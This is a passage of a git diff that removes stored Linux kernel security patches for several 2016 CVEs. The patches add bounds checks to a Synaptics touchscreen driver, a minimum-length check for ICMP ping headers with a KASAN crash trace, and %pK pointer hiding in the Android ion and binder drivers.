-Subject: [PATCH] input: synaptics_dsx: add bounds checks for firmware id
-
-A series of characters between '0' and '9' with a length more than
-MAX_FIRMWARE_ID_LEN causes a heap buffer overflow. This is
-mitigated by performing a bounds check.
-
-Bug: 31911920
-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Signed-off-by: Min Chong <mchong@google.com>
-Change-Id: Iaefe92df2610153f2d3e2caa58322ae82cb5b7c2
----
- .../touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c   | 13 +++++++++----
- 1 file changed, 9 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 908693bd26a43..ff82a4f3a55e8 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -16,6 +16,7 @@
-  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-  * GNU General Public License for more details.
-  */
-+#include <linux/ctype.h>
- #include <linux/kernel.h>
- #include <linux/module.h>
- #include <linux/slab.h>
-@@ -2154,15 +2155,15 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd)
- static int fwu_get_image_firmware_id(unsigned int *fw_id)
- {
- 	int retval;
--	unsigned char index = 0;
--	char *strptr;
- 	char *firmware_id;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
- 	if (fwu->img.contains_firmware_id) {
- 		*fw_id = fwu->img.firmware_id;
- 	} else {
--		strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+		size_t index, max_index;
-+		unsigned char *strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+
- 		if (!strptr) {
- 			dev_err(rmi4_data->pdev->dev.parent,
- 					"%s: No valid PR number (PRxxxxxxx) "
-@@ -2179,7 +2180,11 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id)
- 					__func__);
- 			return -ENOMEM;
- 		}
--		while (strptr[index] >= '0' && strptr[index] <= '9') {
-+
-+		max_index = min((ptrdiff_t)(MAX_FIRMWARE_ID_LEN - 1),
-+				&fwu->image_name[MAX_IMAGE_NAME_LEN] - strptr);
-+		index = 0;
-+		while (index < max_index && isdigit(strptr[index])) {
- 			firmware_id[index] = strptr[index];
- 			index++;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch
deleted file mode 100644
index a3dbbc01..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 8a950b2d64cec7b8022b7572c2d3d9221b2dbab2 Mon Sep 17 00:00:00 2001
-From: Min Chong <mchong@google.com>
-Date: Thu, 13 Oct 2016 09:53:23 -0700
-Subject: [PATCH] input: synaptics_dsx: add bounds checks for firmware id
-
-A series of characters between '0' and '9' with a length more than
-MAX_FIRMWARE_ID_LEN causes a heap buffer overflow. This is
-mitigated by performing a bounds check.
-
-Bug: 31911920
-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Signed-off-by: Min Chong <mchong@google.com>
-Change-Id: Iaefe92df2610153f2d3e2caa58322ae82cb5b7c2
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c        | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index af6f92553aa7e..05f13b427739b 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-@@ -30,7 +30,7 @@
-  * TOTAL CUMULATIVE LIABILITY TO ANY PARTY SHALL NOT EXCEED ONE HUNDRED U.S.
-  * DOLLARS.
-  */
--
-+#include <linux/ctype.h>
- #include <linux/kernel.h>
- #include <linux/module.h>
- #include <linux/slab.h>
-@@ -2508,15 +2508,15 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd)
- static int fwu_get_image_firmware_id(unsigned int *fw_id)
- {
- 	int retval;
--	unsigned char index = 0;
--	char *strptr;
- 	char *firmware_id;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
- 	if (fwu->img.contains_firmware_id) {
- 		*fw_id = fwu->img.firmware_id;
- 	} else {
--		strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+		size_t index, max_index;
-+		unsigned char *strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+
- 		if (!strptr) {
- 			dev_err(rmi4_data->pdev->dev.parent,
- 					"%s: No valid PR number (PRxxxxxxx) found in image file name (%s)\n",
-@@ -2532,7 +2532,11 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id)
- 					__func__);
- 			return -ENOMEM;
- 		}
--		while (strptr[index] >= '0' && strptr[index] <= '9') {
-+
-+		max_index = min((ptrdiff_t)(MAX_FIRMWARE_ID_LEN - 1),
-+				&fwu->image_name[MAX_IMAGE_NAME_LEN] - strptr);
-+		index = 0;
-+		while (index < max_index && isdigit(strptr[index])) {
- 			firmware_id[index] = strptr[index];
- 			index++;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch
deleted file mode 100644
index 95244d79..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 4b9ae9048d63ef9fe9f8cc9d0e33cc38148b268d Mon Sep 17 00:00:00 2001
-From: Ariel Yin <ayin@google.com>
-Date: Wed, 12 Oct 2016 14:02:14 -0700
-Subject: [PATCH] input: synaptics_dsx: add checks of user input data for image
- name
-
-Add checks of the user input count to avoid possible heap overflow
-
-Signed-off-by: Min Chong <mchong@google.com>
-Change-Id: I1d50a103a0abcbff5eb6bf204607170e9278dec3
-Bug: 31913197
----
- drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-index 282e06d9aabaa..1f7409efb1565 100644
---- a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-@@ -1767,6 +1767,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
- {
- 	ssize_t retval;
-+	if (!buf || count > MAX_IMAGE_NAME_LEN) {
-+		dev_err(fwu->rmi4_data->pdev->dev.parent,
-+				"%s: Failed to copy image file name\n",
-+				__func__);
-+		return -EINVAL;
-+	}
- 
- 	if (!mutex_trylock(&dsx_fwu_sysfs_mutex))
- 		return -EBUSY;
diff --git a/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch
deleted file mode 100644
index 23d78a66..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 0eab121ef8750a5c8637d51534d5e9143fb0633f Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Mon, 5 Dec 2016 10:34:38 -0800
-Subject: net: ping: check minimum size on ICMP header length
-
-Prior to commit c0371da6047a ("put iov_iter into msghdr") in v3.19, there
-was no check that the iovec contained enough bytes for an ICMP header,
-and the read loop would walk across neighboring stack contents. Since the
-iov_iter conversion, bad arguments are noticed, but the returned error is
-EFAULT. Returning EINVAL is a clearer error and also solves the problem
-prior to v3.19.
-
-This was found using trinity with KASAN on v3.18:
-
-BUG: KASAN: stack-out-of-bounds in memcpy_fromiovec+0x60/0x114 at addr ffffffc071077da0
-Read of size 8 by task trinity-c2/9623
-page:ffffffbe034b9a08 count:0 mapcount:0 mapping:          (null) index:0x0
-flags: 0x0()
-page dumped because: kasan: bad access detected
-CPU: 0 PID: 9623 Comm: trinity-c2 Tainted: G    BU         3.18.0-dirty #15
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[<ffffffc000209c98>] dump_backtrace+0x0/0x1ac arch/arm64/kernel/traps.c:90
-[<ffffffc000209e54>] show_stack+0x10/0x1c arch/arm64/kernel/traps.c:171
-[<     inline     >] __dump_stack lib/dump_stack.c:15
-[<ffffffc000f18dc4>] dump_stack+0x7c/0xd0 lib/dump_stack.c:50
-[<     inline     >] print_address_description mm/kasan/report.c:147
-[<     inline     >] kasan_report_error mm/kasan/report.c:236
-[<ffffffc000373dcc>] kasan_report+0x380/0x4b8 mm/kasan/report.c:259
-[<     inline     >] check_memory_region mm/kasan/kasan.c:264
-[<ffffffc00037352c>] __asan_load8+0x20/0x70 mm/kasan/kasan.c:507
-[<ffffffc0005b9624>] memcpy_fromiovec+0x5c/0x114 lib/iovec.c:15
-[<     inline     >] memcpy_from_msg include/linux/skbuff.h:2667
-[<ffffffc000ddeba0>] ping_common_sendmsg+0x50/0x108 net/ipv4/ping.c:674
-[<ffffffc000dded30>] ping_v4_sendmsg+0xd8/0x698 net/ipv4/ping.c:714
-[<ffffffc000dc91dc>] inet_sendmsg+0xe0/0x12c net/ipv4/af_inet.c:749
-[<     inline     >] __sock_sendmsg_nosec net/socket.c:624
-[<     inline     >] __sock_sendmsg net/socket.c:632
-[<ffffffc000cab61c>] sock_sendmsg+0x124/0x164 net/socket.c:643
-[<     inline     >] SYSC_sendto net/socket.c:1797
-[<ffffffc000cad270>] SyS_sendto+0x178/0x1d8 net/socket.c:1761
-
-CVE-2016-8399
-
-Reported-by: Qidan He <i@flanker017.me>
-Fixes: c319b4d76b9e ("net: ipv4: add IPPROTO_ICMP socket kind")
-Cc: stable@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ping.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index 205e200..96b8e2b 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -657,6 +657,10 @@ int ping_common_sendmsg(int family, struct msghdr *msg, size_t len,
- 	if (len > 0xFFFF)
- 		return -EMSGSIZE;
- 
-+	/* Must have at least a full ICMP header. */
-+	if (len < icmph_len)
-+		return -EINVAL;
-+
- 	/*
- 	 *	Check the flags.
- 	 */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch
deleted file mode 100644
index d04d8b5d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 44a8e527e156245eff04ff36f426cb1ba8d23e34 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Fri, 7 Oct 2016 11:51:15 -0700
-Subject: [PATCH] ion: blacklist %p kptr_restrict
-
-Bug: 31494725
-Change-Id: I10a0c2aae883dfaa6c235c38689a704064557008
----
- drivers/staging/android/ion/ion.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index a215fd4a5c411..0a5522d308c74 100755
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -803,7 +803,7 @@ static int ion_debug_client_show(struct seq_file *s, void *unused)
- 		struct ion_handle *handle = rb_entry(n, struct ion_handle,
- 						     node);
- 
--		seq_printf(s, "%16.16s: %16zx : %16d : %12p",
-+		seq_printf(s, "%16.16s: %16zx : %16d : %12pK",
- 				handle->buffer->heap->name,
- 				handle->buffer->size,
- 				atomic_read(&handle->ref.refcount),
-@@ -1159,7 +1159,7 @@ static void ion_vm_open(struct vm_area_struct *vma)
- 	mutex_lock(&buffer->lock);
- 	list_add(&vma_list->list, &buffer->vmas);
- 	mutex_unlock(&buffer->lock);
--	pr_debug("%s: adding %p\n", __func__, vma);
-+	pr_debug("%s: adding %pK\n", __func__, vma);
- }
- 
- static void ion_vm_close(struct vm_area_struct *vma)
-@@ -1174,7 +1174,7 @@ static void ion_vm_close(struct vm_area_struct *vma)
- 			continue;
- 		list_del(&vma_list->list);
- 		kfree(vma_list);
--		pr_debug("%s: deleting %p\n", __func__, vma);
-+		pr_debug("%s: deleting %pK\n", __func__, vma);
- 		break;
- 	}
- 	mutex_unlock(&buffer->lock);
diff --git a/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch
deleted file mode 100644
index d91bcad3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch
+++ /dev/null
@@ -1,176 +0,0 @@
-From de51c6f363b8ba7c513e8a5bbae3459571966bfd Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Fri, 7 Oct 2016 11:13:55 -0700
-Subject: [PATCH] binder: blacklist %p kptr_restrict
-
-Bug: 31495231
-Change-Id: Iebc150f6bc939b56e021424ee44fb30ce8d732fd
----
- drivers/staging/android/binder.c | 36 ++++++++++++++++++------------------
- 1 file changed, 18 insertions(+), 18 deletions(-)
-
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index 8c9945d071476..7340ef74433a5 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -534,7 +534,7 @@ static void binder_insert_free_buffer(struct binder_proc *proc,
- 	new_buffer_size = binder_buffer_size(proc, new_buffer);
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "%d: add free buffer, size %zd, at %p\n",
-+		     "%d: add free buffer, size %zd, at %pK\n",
- 		      proc->pid, new_buffer_size, new_buffer);
- 
- 	while (*p) {
-@@ -613,7 +613,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 	struct mm_struct *mm;
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "%d: %s pages %p-%p\n", proc->pid,
-+		     "%d: %s pages %pK-%pK\n", proc->pid,
- 		     allocate ? "allocate" : "free", start, end);
- 
- 	if (end <= start)
-@@ -655,7 +655,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 		BUG_ON(*page);
- 		*page = alloc_page(GFP_KERNEL | __GFP_HIGHMEM | __GFP_ZERO);
- 		if (*page == NULL) {
--			pr_err("%d: binder_alloc_buf failed for page at %p\n",
-+			pr_err("%d: binder_alloc_buf failed for page at %pK\n",
- 				proc->pid, page_addr);
- 			goto err_alloc_page_failed;
- 		}
-@@ -664,7 +664,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 		page_array_ptr = page;
- 		ret = map_vm_area(&tmp_area, PAGE_KERNEL, &page_array_ptr);
- 		if (ret) {
--			pr_err("%d: binder_alloc_buf failed to map page at %p in kernel\n",
-+			pr_err("%d: binder_alloc_buf failed to map page at %pK in kernel\n",
- 			       proc->pid, page_addr);
- 			goto err_map_kernel_failed;
- 		}
-@@ -774,7 +774,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc,
- 	}
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "%d: binder_alloc_buf size %zd got buffer %p size %zd\n",
-+		     "%d: binder_alloc_buf size %zd got buffer %pK size %zd\n",
- 		      proc->pid, size, buffer, buffer_size);
- 
- 	has_page_addr =
-@@ -803,7 +803,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc,
- 		binder_insert_free_buffer(proc, new_buffer);
- 	}
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "%d: binder_alloc_buf size %zd got %p\n",
-+		     "%d: binder_alloc_buf size %zd got %pK\n",
- 		      proc->pid, size, buffer);
- 	buffer->data_size = data_size;
- 	buffer->offsets_size = offsets_size;
-@@ -843,7 +843,7 @@ static void binder_delete_free_buffer(struct binder_proc *proc,
- 		if (buffer_end_page(prev) == buffer_end_page(buffer))
- 			free_page_end = 0;
- 		binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--			     "%d: merge free, buffer %p share page with %p\n",
-+			     "%d: merge free, buffer %pK share page with %pK\n",
- 			      proc->pid, buffer, prev);
- 	}
- 
-@@ -856,14 +856,14 @@ static void binder_delete_free_buffer(struct binder_proc *proc,
- 			    buffer_start_page(buffer))
- 				free_page_start = 0;
- 			binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--				     "%d: merge free, buffer %p share page with %p\n",
-+				     "%d: merge free, buffer %pK share page with %pK\n",
- 				      proc->pid, buffer, prev);
- 		}
- 	}
- 	list_del(&buffer->entry);
- 	if (free_page_start || free_page_end) {
- 		binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--			     "%d: merge free, buffer %p do not share page%s%s with %p or %p\n",
-+			     "%d: merge free, buffer %pK do not share page%s%s with %pK or %pK\n",
- 			     proc->pid, buffer, free_page_start ? "" : " end",
- 			     free_page_end ? "" : " start", prev, next);
- 		binder_update_page_range(proc, 0, free_page_start ?
-@@ -884,7 +884,7 @@ static void binder_free_buf(struct binder_proc *proc,
- 		ALIGN(buffer->offsets_size, sizeof(void *));
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "%d: binder_free_buf %p size %zd buffer_size %zd\n",
-+		     "%d: binder_free_buf %pK size %zd buffer_size %zd\n",
- 		      proc->pid, buffer, size, buffer_size);
- 
- 	BUG_ON(buffer->free);
-@@ -1311,7 +1311,7 @@ static void binder_transaction_buffer_release(struct binder_proc *proc,
- 	int debug_id = buffer->debug_id;
- 
- 	binder_debug(BINDER_DEBUG_TRANSACTION,
--		     "%d buffer release %d, size %zd-%zd, failed at %p\n",
-+		     "%d buffer release %d, size %zd-%zd, failed at %pK\n",
- 		     proc->pid, buffer->debug_id,
- 		     buffer->data_size, buffer->offsets_size, failed_at);
- 
-@@ -2159,7 +2159,7 @@ static int binder_thread_write(struct binder_proc *proc,
- 				}
- 			}
- 			binder_debug(BINDER_DEBUG_DEAD_BINDER,
--				     "%d:%d BC_DEAD_BINDER_DONE %016llx found %p\n",
-+				     "%d:%d BC_DEAD_BINDER_DONE %016llx found %pK\n",
- 				     proc->pid, thread->pid, (u64)cookie, death);
- 			if (death == NULL) {
- 				binder_user_error("%d:%d BC_DEAD_BINDER_DONE %016llx not found\n",
-@@ -2907,7 +2907,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma)
- #ifdef CONFIG_CPU_CACHE_VIPT
- 	if (cache_is_vipt_aliasing()) {
- 		while (CACHE_COLOUR((vma->vm_start ^ (uint32_t)proc->buffer))) {
--			pr_info("binder_mmap: %d %lx-%lx maps %p bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer);
-+			pr_info("binder_mmap: %d %lx-%lx maps %pK bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer);
- 			vma->vm_start += PAGE_SIZE;
- 		}
- 	}
-@@ -2943,7 +2943,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma)
- 	proc->vma = vma;
- 	proc->vma_vm_mm = vma->vm_mm;
- 
--	/*pr_info("binder_mmap: %d %lx-%lx maps %p\n",
-+	/*pr_info("binder_mmap: %d %lx-%lx maps %pK\n",
- 		 proc->pid, vma->vm_start, vma->vm_end, proc->buffer);*/
- 	return 0;
- 
-@@ -3165,7 +3165,7 @@ static void binder_deferred_release(struct binder_proc *proc)
- 
- 			page_addr = proc->buffer + i * PAGE_SIZE;
- 			binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--				     "%s: %d: page %d at %p not freed\n",
-+				     "%s: %d: page %d at %pK not freed\n",
- 				     __func__, proc->pid, i, page_addr);
- 			unmap_kernel_range((unsigned long)page_addr, PAGE_SIZE);
- 			__free_page(proc->pages[i]);
-@@ -3249,7 +3249,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- 				     struct binder_transaction *t)
- {
- 	seq_printf(m,
--		   "%s %d: %p from %d:%d to %d:%d code %x flags %x pri %ld r%d",
-+		   "%s %d: %pK from %d:%d to %d:%d code %x flags %x pri %ld r%d",
- 		   prefix, t->debug_id, t,
- 		   t->from ? t->from->proc->pid : 0,
- 		   t->from ? t->from->pid : 0,
-@@ -3263,7 +3263,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- 	if (t->buffer->target_node)
- 		seq_printf(m, " node %d",
- 			   t->buffer->target_node->debug_id);
--	seq_printf(m, " size %zd:%zd data %p\n",
-+	seq_printf(m, " size %zd:%zd data %pK\n",
- 		   t->buffer->data_size, t->buffer->offsets_size,
- 		   t->buffer->data);
- }
-@@ -3271,7 +3271,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix,
- static void print_binder_buffer(struct seq_file *m, const char *prefix,
- 				struct binder_buffer *buffer)
- {
--	seq_printf(m, "%s %d: %p size %zd:%zd %s\n",
-+	seq_printf(m, "%s %d: %pK size %zd:%zd %s\n",
- 		   prefix, buffer->debug_id, buffer->data,
- 		   buffer->data_size, buffer->offsets_size,
- 		   buffer->transaction ? "active" : "delivered");
diff --git a/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch
deleted file mode 100644
index c8e6de21..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch
+++ /dev/null
@@ -1,394 +0,0 @@
-From 8e145d45fdff30cb6471b7cc9717c30b21a0ec6b Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Thu, 16 Feb 2017 18:59:44 +0530
-Subject: binder: blacklist %p kptr_restrict
-
-Bug: 31495231
-Change-Id: Iebc150f6bc939b56e021424ee44fb30ce8d732fd
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 0804d7840364fc1a93652632bd43a93c055c658e
-Signed-off-by: Rahul Sharma <sharah@codeaurora.org>
----
- drivers/staging/android/binder.c | 92 ++++++++++++++++++++--------------------
- 1 file changed, 46 insertions(+), 46 deletions(-)
-
-(limited to 'drivers')
-
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index 38d47e7..5ae7c13 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -556,7 +556,7 @@ static void binder_insert_free_buffer(struct binder_proc *proc,
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
- 		     "binder: %d: add free buffer, size %zd, "
--		     "at %p\n", proc->pid, new_buffer_size, new_buffer);
-+		     "at %pK\n", proc->pid, new_buffer_size, new_buffer);
- 
- 	while (*p) {
- 		parent = *p;
-@@ -634,7 +634,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 	struct mm_struct *mm;
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "binder: %d: %s pages %p-%p\n", proc->pid,
-+		     "binder: %d: %s pages %pK-%pK\n", proc->pid,
- 		     allocate ? "allocate" : "free", start, end);
- 
- 	if (end <= start)
-@@ -675,7 +675,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 		*page = alloc_page(GFP_KERNEL | __GFP_HIGHMEM | __GFP_ZERO);
- 		if (*page == NULL) {
- 			printk(KERN_ERR "binder: %d: binder_alloc_buf failed "
--			       "for page at %p\n", proc->pid, page_addr);
-+			       "for page at %pK\n", proc->pid, page_addr);
- 			goto err_alloc_page_failed;
- 		}
- 		tmp_area.addr = page_addr;
-@@ -684,7 +684,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate,
- 		ret = map_vm_area(&tmp_area, PAGE_KERNEL, &page_array_ptr);
- 		if (ret) {
- 			printk(KERN_ERR "binder: %d: binder_alloc_buf failed "
--			       "to map page at %p in kernel\n",
-+			       "to map page at %pK in kernel\n",
- 			       proc->pid, page_addr);
- 			goto err_map_kernel_failed;
- 		}
-@@ -790,7 +790,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc,
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
- 		     "binder: %d: binder_alloc_buf size %zd got buff"
--		     "er %p size %zd\n", proc->pid, size, buffer, buffer_size);
-+		     "er %pK size %zd\n", proc->pid, size, buffer, buffer_size);
- 
- 	has_page_addr =
- 		(void *)(((uintptr_t)buffer->data + buffer_size) & PAGE_MASK);
-@@ -819,7 +819,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc,
- 	}
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
- 		     "binder: %d: binder_alloc_buf size %zd got "
--		     "%p\n", proc->pid, size, buffer);
-+		     "%pK\n", proc->pid, size, buffer);
- 	buffer->data_size = data_size;
- 	buffer->offsets_size = offsets_size;
- 	buffer->async_transaction = is_async;
-@@ -859,8 +859,8 @@ static void binder_delete_free_buffer(struct binder_proc *proc,
- 		if (buffer_end_page(prev) == buffer_end_page(buffer))
- 			free_page_end = 0;
- 		binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--			     "binder: %d: merge free, buffer %p "
--			     "share page with %p\n", proc->pid, buffer, prev);
-+			     "binder: %d: merge free, buffer %pK "
-+			     "share page with %pK\n", proc->pid, buffer, prev);
- 	}
- 
- 	if (!list_is_last(&buffer->entry, &proc->buffers)) {
-@@ -873,15 +873,15 @@ static void binder_delete_free_buffer(struct binder_proc *proc,
- 				free_page_start = 0;
- 			binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
- 				     "binder: %d: merge free, buffer"
--				     " %p share page with %p\n", proc->pid,
-+				     " %pK share page with %pK\n", proc->pid,
- 				     buffer, prev);
- 		}
- 	}
- 	list_del(&buffer->entry);
- 	if (free_page_start || free_page_end) {
- 		binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--			     "binder: %d: merge free, buffer %p do "
--			     "not share page%s%s with with %p or %p\n",
-+			     "binder: %d: merge free, buffer %pK do "
-+			     "not share page%s%s with with %pK or %pK\n",
- 			     proc->pid, buffer, free_page_start ? "" : " end",
- 			     free_page_end ? "" : " start", prev, next);
- 		binder_update_page_range(proc, 0, free_page_start ?
-@@ -902,7 +902,7 @@ static void binder_free_buf(struct binder_proc *proc,
- 		ALIGN(buffer->offsets_size, sizeof(void *));
- 
- 	binder_debug(BINDER_DEBUG_BUFFER_ALLOC,
--		     "binder: %d: binder_free_buf %p size %zd buffer"
-+		     "binder: %d: binder_free_buf %pK size %zd buffer"
- 		     "_size %zd\n", proc->pid, buffer, size, buffer_size);
- 
- 	BUG_ON(buffer->free);
-@@ -999,7 +999,7 @@ static struct binder_node *binder_new_node(struct binder_proc *proc,
- 	INIT_LIST_HEAD(&node->work.entry);
- 	INIT_LIST_HEAD(&node->async_todo);
- 	binder_debug(BINDER_DEBUG_INTERNAL_REFS,
--		     "binder: %d:%d node %d u%p c%p created\n",
-+		     "binder: %d:%d node %d u%pK c%pK created\n",
- 		     proc->pid, current->pid, node->debug_id,
- 		     node->ptr, node->cookie);
- 	return node;
-@@ -1335,7 +1335,7 @@ static void binder_transaction_buffer_release(struct binder_proc *proc,
- 	int debug_id = buffer->debug_id;
- 
- 	binder_debug(BINDER_DEBUG_TRANSACTION,
--		     "binder: %d buffer release %d, size %zd-%zd, failed at %p\n",
-+		     "binder: %d buffer release %d, size %zd-%zd, failed at %pK\n",
- 		     proc->pid, buffer->debug_id,
- 		     buffer->data_size, buffer->offsets_size, failed_at);
- 
-@@ -1364,11 +1364,11 @@ static void binder_transaction_buffer_release(struct binder_proc *proc,
- 			struct binder_node *node = binder_get_node(proc, fp->binder);
- 			if (node == NULL) {
- 				printk(KERN_ERR "binder: transaction release %d"
--				       " bad node %p\n", debug_id, fp->binder);
-+				       " bad node %pK\n", debug_id, fp->binder);
- 				break;
- 			}
- 			binder_debug(BINDER_DEBUG_TRANSACTION,
--				     "        node %d u%p\n",
-+				     "        node %d u%pK\n",
- 				     node->debug_id, node->ptr);
- 			binder_dec_node(node, fp->type == BINDER_TYPE_BINDER, 0);
- 		} break;
-@@ -1552,7 +1552,7 @@ static void binder_transaction(struct binder_proc *proc,
- 	if (reply)
- 		binder_debug(BINDER_DEBUG_TRANSACTION,
- 			     "binder: %d:%d BC_REPLY %d -> %d:%d, "
--			     "data %p-%p size %zd-%zd\n",
-+			     "data %pK-%pK size %zd-%zd\n",
- 			     proc->pid, thread->pid, t->debug_id,
- 			     target_proc->pid, target_thread->pid,
- 			     tr->data.ptr.buffer, tr->data.ptr.offsets,
-@@ -1560,7 +1560,7 @@ static void binder_transaction(struct binder_proc *proc,
- 	else
- 		binder_debug(BINDER_DEBUG_TRANSACTION,
- 			     "binder: %d:%d BC_TRANSACTION %d -> "
--			     "%d - node %d, data %p-%p size %zd-%zd\n",
-+			     "%d - node %d, data %pK-%pK size %zd-%zd\n",
- 			     proc->pid, thread->pid, t->debug_id,
- 			     target_proc->pid, target_node->debug_id,
- 			     tr->data.ptr.buffer, tr->data.ptr.offsets,
-@@ -1647,8 +1647,8 @@ static void binder_transaction(struct binder_proc *proc,
